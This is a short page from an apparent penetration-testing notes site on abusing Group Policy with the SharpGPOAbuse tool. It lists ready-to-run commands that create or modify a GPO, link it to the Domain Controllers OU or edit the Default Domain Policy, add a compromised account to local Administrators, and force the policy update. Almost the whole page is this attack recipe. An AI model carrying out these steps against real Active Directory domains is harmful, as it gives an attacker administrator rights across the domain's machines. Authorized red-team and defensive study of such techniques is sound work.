search
githubEdit

SharpGPOAbuse

hashtag
Github repo: https://github.com/byronkg/SharpGPOAbuse/releases/tag/1.0

hashtag
Use case: Our compromised user has the permissions to create GPOs OR modify already existing GPOs

hashtag
Usage:

hashtag
GPO Creation

New-GPO -Name pwned -Comment "You have been pwned" (Create a new GPO)

New-GPLink -Name pwned -Target "OU=Domain Controllers,DC=DOMAIN,DC=LOCAL" -LinkEnabled Yes (Create a new GPLink)

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount OUR_COMPROMISED_ACCOUNT --gponame pwned

gpupdate /force

hashtag
GPO Modification

Get-GPO -All | Select-Object -ExpandProperty DisplayName (Enumerate All GPOs)

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount USER --GPOName "Default Domain Policy" (Modify an existing GPO to add our user to local administrators group)

gpupdate /force (Immediately apply our GPO modification)

net localgroup Administrators (Verify our user is in the local administrators group)
PreviousExploitation with PowerviewNextLdeep

Last updated